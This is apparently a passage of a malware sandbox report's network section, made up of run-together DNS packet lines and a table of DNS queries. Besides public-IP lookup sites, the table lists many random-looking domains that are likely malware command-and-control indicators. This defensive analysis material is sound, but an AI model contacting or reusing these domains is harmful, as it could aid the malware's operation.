                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:57.522588968 CEST53494771.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:57.525916100 CEST5378753192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:57.657691956 CEST53537871.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:57.660623074 CEST5357553192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:57.825530052 CEST53535751.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:57.828598022 CEST6424953192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:58.036119938 CEST53642491.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:58.039510012 CEST4964253192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:58.353249073 CEST53496421.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:58.356168032 CEST5422653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:58.489398956 CEST53542261.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:58.492325068 CEST6176853192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:58.704735041 CEST53617681.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:58.707912922 CEST5155953192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:58.872731924 CEST53515591.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:58.875504971 CEST6446753192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:59.006763935 CEST53644671.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:59.009589911 CEST5793953192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:59.143372059 CEST53579391.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:59.146507978 CEST5321753192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:59.287482023 CEST6405053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:59.377525091 CEST53532171.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:59.380774975 CEST6511353192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:59.426335096 CEST53640501.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:59.511931896 CEST53651131.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:59.515264988 CEST5667153192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:59.647332907 CEST53566711.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:59.650487900 CEST5557153192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:59.948757887 CEST53555711.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:59.951936007 CEST6145153192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:00.080667973 CEST53614511.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:00.084130049 CEST6187953192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:00.247585058 CEST53618791.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:00.250597000 CEST5488653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:00.415306091 CEST53548861.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:00.418502092 CEST5714253192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:00.443864107 CEST5980053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:00.549045086 CEST53571421.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:00.552272081 CEST6322453192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:00.573348999 CEST53598001.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:00.686049938 CEST53632241.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:00.689439058 CEST5515053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:00.820766926 CEST53551501.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:00.823631048 CEST5260653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:00.954222918 CEST53526061.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:00.957568884 CEST5255453192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:01.151454926 CEST53525541.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:01.154458046 CEST4994253192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:01.287635088 CEST53499421.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:01.291104078 CEST6081153192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:01.453718901 CEST53608111.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:01.456621885 CEST5168353192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:01.590816975 CEST53516831.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:01.593631029 CEST6435853192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:01.888709068 CEST53643581.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:01.891725063 CEST5339653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:02.024576902 CEST53533961.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:02.027658939 CEST6245053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:02.234149933 CEST53624501.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:04.912002087 CEST5788953192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:05.041791916 CEST53578891.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:05.270987988 CEST6419553192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:05.433868885 CEST53641951.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:05.437107086 CEST5429353192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:05.606949091 CEST53542931.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:05.610394001 CEST5579453192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:05.740880966 CEST53557941.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:05.744123936 CEST6228653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:05.907262087 CEST53622861.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:05.910861015 CEST6252453192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:06.051698923 CEST5956953192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:06.074598074 CEST53625241.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:06.077606916 CEST5423853192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:06.182168007 CEST53595691.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:06.276040077 CEST53542381.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:06.279476881 CEST5047053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:06.504889011 CEST53504701.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:06.508794069 CEST5692153192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:06.674196959 CEST53569211.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:06.677675009 CEST5443653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:06.809618950 CEST53544361.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:06.812747002 CEST5386253192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:06.944685936 CEST53538621.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:06.948067904 CEST6335053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.080096006 CEST53633501.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.083620071 CEST6508453192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.289221048 CEST53650841.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.292474031 CEST5492153192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.454277039 CEST53549211.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.457473993 CEST6401053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.594712973 CEST53640101.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.597765923 CEST5602053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.801260948 CEST53560201.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.804894924 CEST5661053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.968422890 CEST53566101.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.971553087 CEST6544353192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:08.102128029 CEST53654431.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:08.104996920 CEST5661353192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:08.407915115 CEST53566131.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:08.411901951 CEST5215153192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:08.542010069 CEST53521511.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:08.545228958 CEST6207553192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:08.784792900 CEST53620751.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:08.787936926 CEST6527053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:08.951042891 CEST53652701.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:08.954477072 CEST5282053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:09.118925095 CEST53528201.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:09.121844053 CEST5677953192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:09.419800997 CEST53567791.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:09.422920942 CEST6012053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:09.598784924 CEST53601201.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:09.602078915 CEST6156253192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:09.812100887 CEST53615621.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:12.905014038 CEST4989653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:13.036602974 CEST53498961.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:13.039949894 CEST6366253192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:13.222948074 CEST53636621.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:13.226073980 CEST5389653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:13.357429981 CEST53538961.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:13.360898972 CEST5157153192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:13.494137049 CEST53515711.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:13.497730017 CEST4951453192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:13.629539967 CEST53495141.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:13.632421970 CEST5405053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:13.814726114 CEST53540501.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:13.818116903 CEST4975653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:13.947834969 CEST53497561.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:13.951265097 CEST5738353192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:14.082676888 CEST53573831.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:14.086193085 CEST5071953192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:14.300617933 CEST53507191.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:14.303845882 CEST5825753192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:14.468369961 CEST53582571.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:14.471139908 CEST5015853192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:14.636611938 CEST53501581.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:14.639642954 CEST6335653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:14.781891108 CEST53633561.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:14.785166025 CEST6055053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:14.967777967 CEST53605501.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:14.970844984 CEST6116053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:15.133441925 CEST53611601.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:15.136620045 CEST6230753192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:15.268141031 CEST53623071.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:15.271349907 CEST5974653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:15.403243065 CEST53597461.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:15.406755924 CEST6404053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:15.537328005 CEST53640401.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:15.540358067 CEST4984353192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:15.673921108 CEST53498431.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:15.677042961 CEST6542553192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:15.808639050 CEST53654251.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:15.811647892 CEST6155253192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:15.941210985 CEST53615521.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:15.944691896 CEST5833453192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:16.174685001 CEST53583341.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:16.178014040 CEST5971053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:16.413115978 CEST53597101.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:16.416313887 CEST6220653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:16.548532963 CEST53622061.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:16.551795959 CEST6414053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:16.715807915 CEST53641401.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:16.719321012 CEST5234953192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:16.903140068 CEST53523491.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:16.906594038 CEST5937853192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:17.069770098 CEST53593781.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:17.073424101 CEST5835053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:17.202601910 CEST53583501.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:17.206625938 CEST5054853192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:17.369883060 CEST53505481.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:17.373308897 CEST5322853192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:17.606075048 CEST53532281.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:17.609843969 CEST6087653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:17.773010969 CEST53608761.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:17.776593924 CEST5032353192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:17.907826900 CEST53503231.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:17.911267996 CEST5888453192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:18.043180943 CEST53588841.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:18.045850039 CEST5065953192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:18.175466061 CEST53506591.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:18.178642988 CEST6528753192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:18.309672117 CEST53652871.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:18.313116074 CEST5403253192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:18.443211079 CEST53540321.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:21.487586021 CEST5111953192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:21.650276899 CEST53511191.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:21.653847933 CEST5776753192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:21.953766108 CEST53577671.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:21.957401991 CEST5469053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:22.121715069 CEST53546901.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:22.125103951 CEST5175553192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:22.289572954 CEST53517551.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:22.292558908 CEST5106053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:22.423259020 CEST53510601.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:22.426474094 CEST5688553192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:22.657285929 CEST53568851.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:22.660937071 CEST5870453192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:22.830053091 CEST53587041.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:22.833848953 CEST5046153192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:22.966583967 CEST53504611.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:22.970261097 CEST5862853192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:23.102112055 CEST53586281.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:23.105150938 CEST5429653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:23.312868118 CEST53542961.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:26.341943026 CEST6419653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:26.549401999 CEST53641961.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:26.552638054 CEST5455053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:26.760077953 CEST53545501.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:26.763279915 CEST6451453192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:26.957865953 CEST53645141.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:26.961076975 CEST5271353192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:27.126580000 CEST53527131.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:27.130109072 CEST5303853192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:27.260960102 CEST53530381.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:27.264703035 CEST6529653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:27.397468090 CEST53652961.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:27.400918007 CEST5124153192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:27.580326080 CEST53512411.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:27.583868027 CEST6546753192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:27.715879917 CEST53654671.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:36.417347908 CEST192.168.11.1192.168.11.30952d(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                    Oct 15, 2024 15:38:40.414622068 CEST192.168.11.301.1.1.10x785eStandard query (0)c.pki.googA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:38:58.442030907 CEST192.168.11.301.1.1.10x46a9Standard query (0)www.whatismyip.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:38:59.711370945 CEST192.168.11.301.1.1.10x9751Standard query (0)whatismyip.everdot.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:04.110301971 CEST192.168.11.301.1.1.10x6ae7Standard query (0)whatismyipaddress.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:05.532372952 CEST192.168.11.301.1.1.10xa060Standard query (0)www.showmyipaddress.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:06.969485998 CEST192.168.11.301.1.1.10xa7deStandard query (0)whatismyip.everdot.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:08.110032082 CEST192.168.11.301.1.1.10xa248Standard query (0)www.whatismyip.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:11.890161037 CEST192.168.11.301.1.1.10xd4fcStandard query (0)www.whatismyip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:13.327150106 CEST192.168.11.301.1.1.10x9d4dStandard query (0)www.whatismyip.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:15.482992887 CEST192.168.11.301.1.1.10x2a8cStandard query (0)whatismyip.everdot.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:19.935543060 CEST192.168.11.301.1.1.10x2f1dStandard query (0)www.whatismyip.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:23.666913033 CEST192.168.11.301.1.1.10x5280Standard query (0)www.myspace.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.130404949 CEST192.168.11.301.1.1.10x56f5Standard query (0)lwbjtptjlzji.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.323012114 CEST192.168.11.301.1.1.10x742eStandard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.825845003 CEST192.168.11.301.1.1.10x22c0Standard query (0)deroocmofof.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:25.055627108 CEST192.168.11.301.1.1.10x3e04Standard query (0)fltebaltkwm.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:25.189435005 CEST192.168.11.301.1.1.10xd888Standard query (0)eukvpt.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:25.389005899 CEST192.168.11.301.1.1.10xc82Standard query (0)cdrmqone.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:25.553493977 CEST192.168.11.301.1.1.10xb02dStandard query (0)xhjwwgwd.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:26.343383074 CEST192.168.11.301.1.1.10xcd37Standard query (0)ggsukwasb.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:26.538328886 CEST192.168.11.301.1.1.10xff6bStandard query (0)spyutmxdvvrw.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:26.744209051 CEST192.168.11.301.1.1.10xf704Standard query (0)nwdyhujtzi.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:26.913572073 CEST192.168.11.301.1.1.10x8c4fStandard query (0)cecitmbetwe.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:27.115839005 CEST192.168.11.301.1.1.10x4087Standard query (0)fnvcomt.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:27.283669949 CEST192.168.11.301.1.1.10xabe7Standard query (0)koqaswsiic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:27.323983908 CEST192.168.11.301.1.1.10xb2f0Standard query (0)whatismyip.everdot.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:27.469182968 CEST192.168.11.301.1.1.10x68c5Standard query (0)ooqfgvnllbdj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:27.635292053 CEST192.168.11.301.1.1.10x1129Standard query (0)ywzcjat.infoA (IP address)IN (0x0001)false
